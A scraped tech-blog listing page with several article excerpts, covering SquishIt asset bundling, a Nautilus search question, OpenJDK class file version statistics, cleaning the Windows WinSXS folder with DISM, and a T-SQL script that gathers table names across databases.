    Tools to optimize performance: the PageSpeed tools family http://code.google.com/intl/ru/speed/page-speed/download.html
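    For reference, a sketch of the SquishIt bundling calls described in the linked post (paths are hypothetical; the '#' in the output name is replaced with a content hash, so cached bundles are invalidated when the contents change):

        <%-- In an .aspx page or master page --%>
        <%= SquishIt.Framework.Bundle.Css()
                .Add("~/css/reset.css")
                .Add("~/css/site.css")
                .Render("~/css/combined_#.css") %>

        <%= SquishIt.Framework.Bundle.JavaScript()
                .Add("~/js/jquery.js")
                .Add("~/js/site.js")
                .Render("~/js/combined_#.js") %>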

    Read the article

  • How to use the Nautilus search option

    - by Luis Alvarado
    In Nautilus, if I press CTRL+F I get a search box that helps me search the current directory and subdirectories for specific names, but what if I want to:
    - Find ALL files (including files without extensions)
    - Find a file without an extension (without the dot symbol or any other name/extension separator)
    - Find a file with/without a special character
    - Find all files that do/do not start with a character
    - Find all files that do/do not end with a character
    - Find all files that do/do not start with a character but do/do not end with a character
    - Find only files/folders
    - Find files with specific text in them
    - Find files with less/more/equal than/to X size
    - Find files modified/created on X date
    All of these searches should happen in the Nautilus search box I mentioned before. I ask this since KDE's search is much better at this and gives pretty good freedom in searching for virtually anything, so I might not be learning how to use the Nautilus search option correctly. Note that I am talking about the first search done, since some of these options show AFTER a search is done, so the user can narrow it down by doing a more specific search inside the search results (of the first search). I am asking here how to do any of the search options I mentioned above in the first search.

    Read the article

  • Friday Stats

    - by jjg
    As some of you may have noticed, we've recently opened a new repository in the Code Tools project for small utilities which can be used to gather info about the OpenJDK code base and builds. The latest addition is a utility for analyzing the class file versions in a collection of class files. I've posted an example set of results from analyzing the class files in an OpenJDK build on Linux. Most of the files are version 52 files, as you would expect, but there is a surprising number of version 51 and 50 files, as well as a handful of v45.3 files. Digging deeper, it turns out that Nashorn is still using version 51 class files, and the Serviceability Agent is still using version 50 class files and one 45.3 class file, leaving the remainder of the 45.3 class files coming from RMI. For more info on the different class file versions, see Joe Darcy's class file version decoder ring. Thanks to Stuart Marks for planting the seed for the class file version tool. See the project page, repo, and mail archive. http://cr.openjdk.java.net/~jjg/cfv-summary/open/
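    The version check itself is simple: the first eight bytes of a class file are the 0xCAFEBABE magic followed by the minor and major version numbers, all big-endian. A minimal sketch:

        # Print a class file's version, e.g. 52.0 for JDK 8 output.
        import struct, sys

        with open(sys.argv[1], "rb") as f:
            magic, minor, major = struct.unpack(">IHH", f.read(8))
        assert magic == 0xCAFEBABE, "not a class file"
        print("%d.%d" % (major, minor))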

    Read the article

  • How to Reduce the Size of Your WinSXS Folder on Windows 7 or 8

    - by Chris Hoffman
    The WinSXS folder at C:\Windows\WinSXS is massive and continues to grow the longer you have Windows installed. This folder builds up unnecessary files over time, such as old versions of system components. It also contains files for uninstalled, disabled Windows components. Even if you don't have a Windows component installed, it will be present in your WinSXS folder, taking up space.

    Why the WinSXS Folder Gets So Big

    The WinSXS folder contains all Windows system components. In fact, component files elsewhere in Windows are just links to files contained in the WinSXS folder. The WinSXS folder contains every operating system file. When Windows installs updates, it drops the new Windows component in the WinSXS folder and keeps the old component in the WinSXS folder. This means that every Windows update you install increases the size of your WinSXS folder. This allows you to uninstall operating system updates from the Control Panel, which can be useful in the case of a buggy update — but it's a feature that's rarely used.

    Windows 7 dealt with this by including a feature that allows Windows to clean up old Windows update files after you install a new Windows service pack. The idea was that the system could be cleaned up regularly along with service packs. However, Windows 7 only saw one service pack — Service Pack 1 — released in 2010, and Microsoft has no intention of launching another. This means that, for more than three years, Windows update uninstallation files have been building up on Windows 7 systems and couldn't be easily removed.

    Clean Up Update Files

    To fix this problem, Microsoft recently backported a feature from Windows 8 to Windows 7. They did this without much fanfare — it was rolled out in a typical minor operating system update, the kind that doesn't generally add new features.

    To clean up such update files, open the Disk Cleanup wizard (tap the Windows key, type "disk cleanup" into the Start menu, and press Enter). Click the Clean up System Files button, enable the Windows Update Cleanup option, and click OK. If you've been using your Windows 7 system for a few years, you'll likely be able to free several gigabytes of space. The next time you reboot after doing this, Windows will take a few minutes to clean up system files before you can log in and use your desktop. If you don't see this feature in the Disk Cleanup window, you're likely behind on your updates — install the latest updates from Windows Update.

    Windows 8 and 8.1 include built-in features that do this automatically. In fact, there's a StartComponentCleanup scheduled task included with Windows that will automatically run in the background, cleaning up components 30 days after you've installed them. This 30-day period gives you time to uninstall an update if it causes problems. If you'd like to manually clean up updates, you can also use the Windows Update Cleanup option in the Disk Cleanup window, just as you can on Windows 7. (To open it, tap the Windows key, type "disk cleanup" to perform a search, and click the "Free up disk space by removing unnecessary files" shortcut that appears.)

    Windows 8.1 gives you more options, allowing you to forcibly remove all previous versions of uninstalled components, even ones that haven't been around for more than 30 days. These commands must be run in an elevated Command Prompt — in other words, start the Command Prompt window as Administrator.
    For example, the following command will uninstall all previous versions of components without the scheduled task's 30-day grace period:

        DISM.exe /online /Cleanup-Image /StartComponentCleanup

    The following command will remove files needed for uninstallation of service packs. You won't be able to uninstall any currently installed service packs after running this command:

        DISM.exe /online /Cleanup-Image /SPSuperseded

    The following command will remove all old versions of every component. You won't be able to uninstall any currently installed service packs or updates after this completes:

        DISM.exe /online /Cleanup-Image /StartComponentCleanup /ResetBase

    Remove Features on Demand

    Modern versions of Windows allow you to enable or disable Windows features on demand. You'll find a list of these features in the Windows Features window, which you can access from the Control Panel. Even features you don't have installed — that is, the features you see unchecked in this window — are stored on your hard drive in your WinSXS folder. If you choose to install them, they'll be made available from your WinSXS folder. This means you won't have to download anything or provide Windows installation media to install these features.

    However, these features take up space. While this shouldn't matter on typical computers, users with extremely low amounts of storage or Windows server administrators who want to slim their Windows installs down to the smallest possible set of system files may want to get these files off their hard drives. For this reason, Windows 8 added a new option that allows you to remove these uninstalled components from the WinSXS folder entirely, freeing up space. If you choose to install the removed components later, Windows will prompt you to download the component files from Microsoft.

    To do this, open a Command Prompt window as Administrator. Use the following command to see the features available to you:

        DISM.exe /Online /English /Get-Features /Format:Table

    You'll see a table of feature names and their states. To remove a feature from your system, you'd use the following command, replacing NAME with the name of the feature you want to remove. You can get the feature name you need from the table above.

        DISM.exe /Online /Disable-Feature /featurename:NAME /Remove

    If you run the /Get-Features command again, you'll now see that the feature has a status of "Disabled with Payload Removed" instead of just "Disabled." That's how you know it's not taking up space on your computer's hard drive.

    If you're trying to slim down a Windows system as much as possible, be sure to check out our lists of ways to free up disk space on Windows and reduce the space used by system files.

    Read the article

  • Resolving data redundancy up front

    - by okeofs
    Introduction

    As all of us do when confronted with a problem, the resource of choice is to 'Google it'. This is where the plot thickens. Recently I was asked to stage data from numerous databases which were to be loaded into a data warehouse. To make a long story short, I was looking for a manner in which to obtain the table names from each database, to ascertain potential overlap. As the source data comes from a SQL database created from dumps of a third-party product, one could say that there were +/- 95 tables for each database. Yes, I know that the first instinct is to use the system stored procedure "exec sp_msforeachdb 'select "?" AS db, * from [?].sys.tables'". However, if one stops to think about this, it would be nice to have all the results in a temporary or disc-based table, which in itself implies additional labour. This said, I decided to 're-invent' the wheel. The full code sample may be found at the bottom of this article.

    Define a few temporary tables and variables

        declare @SQL varchar(max);
        declare @databasename varchar(75)
        /*
        drop table ##rawdata3
        drop table #rawdata1
        drop table #rawdata11
        */

        -- A temp table to hold the names of my databases
        CREATE TABLE #rawdata1
        (
           database_name varchar(50),
           database_size varchar(50),
           remarks varchar(50)
        )

        -- A temp table with the same database names as above, HOWEVER using an
        -- identity number (recNo) as a loop variable. You will note below that
        -- I loop through until I reach 25, as at that point the system
        -- databases, the reporting server database etc. begin; 1-24 are user
        -- databases, and these are really what I was looking for. Whilst NOT
        -- the best solution, it works, and the code was meant as a quick and
        -- dirty.
        CREATE TABLE #rawdata11
        (
           recNo int identity(1,1),
           database_name varchar(50),
           database_size varchar(50),
           remarks varchar(50)
        )

        -- My output table showing the database name and table name
        CREATE TABLE ##rawdata3
        (
           database_name varchar(75),
           table_name varchar(75)
        )

    Insert the database names into a temporary table

    I pull the database names using the system stored procedure sp_databases:

        INSERT INTO #rawdata1
        EXEC sp_databases
        GO

    Then I insert the results from #rawdata1 into a table containing a record number (#rawdata11) so that I can LOOP through the extract:

        INSERT into #rawdata11
        select * from #rawdata1

    We now declare 3 more variables: @kounter is used to keep track of our position within the loop. @databasename is used to keep track of the 'current' database name being used in the current pass of the loop, as in order to obtain the tables for that database we need to issue a 'USE' statement, an insert command, and other related code parts. This is the challenging part. @sql is a varchar(max) variable used to contain the 'USE' statement PLUS the 'insert' code statements. We now initialize @kounter to 1.

        declare @kounter int;
        declare @databasename varchar(75);
        declare @sql varchar(max);
        set @kounter = 1

    The Loop

    The astute reader will remember that the temporary table #rawdata11 contains our database names and each 'database row' has a record number (recNo). I am only interested in record numbers under 25. I now set the value of the temporary variable @DatabaseName (see below). Note that I used the row number as a part of the predicate. Now, knowing the database name, I can create dynamic T-SQL to be executed using the sp_sqlexec stored procedure (see the code below).
    Finally, after all the tables for the given database have been placed in the temporary table ##rawdata3, I increment the counter and continue on. Note that I used a global temporary table to ensure that the result set persists after the termination of the run. At some stage, I plan to redo this part of the code, as global temporary tables are not really an ideal solution.

        WHILE (@kounter < 25)
        BEGIN
          select @DatabaseName = database_name from #rawdata11 where recNo = @kounter
          set @SQL = 'Use ' + @DatabaseName + ' Insert into ##rawdata3 '
                   + ' SELECT table_catalog, Table_name FROM information_schema.tables'
          exec sp_sqlexec @Sql
          SET @kounter = @kounter + 1
        END

    The full code extract

    Here is the full code sample.

        declare @SQL varchar(max);
        declare @databasename varchar(75)
        /*
        drop table ##rawdata3
        drop table #rawdata1
        drop table #rawdata11
        */
        CREATE TABLE #rawdata1
        (
           database_name varchar(50),
           database_size varchar(50),
           remarks varchar(50)
        )
        CREATE TABLE #rawdata11
        (
           recNo int identity(1,1),
           database_name varchar(50),
           database_size varchar(50),
           remarks varchar(50)
        )
        CREATE TABLE ##rawdata3
        (
           database_name varchar(75),
           table_name varchar(75)
        )

        INSERT INTO #rawdata1
        EXEC sp_databases
        go

        INSERT into #rawdata11
        select * from #rawdata1

        declare @kounter int;
        declare @databasename varchar(75);
        declare @sql varchar(max);
        set @kounter = 1

        WHILE (@kounter < 25)
        BEGIN
          select @databasename = database_name from #rawdata11 where recNo = @kounter
          set @SQL = 'Use ' + @DatabaseName + ' Insert into ##rawdata3 '
                   + ' SELECT table_catalog, Table_name FROM information_schema.tables'
          exec sp_sqlexec @Sql
          SET @kounter = @kounter + 1
        END

        select * from ##rawdata3
        where table_name like '%SalesOrderHeader%'

    Read the article

< Previous Page | 403 404 405 406 407 408 409 410 411 412 413 414  | Next Page >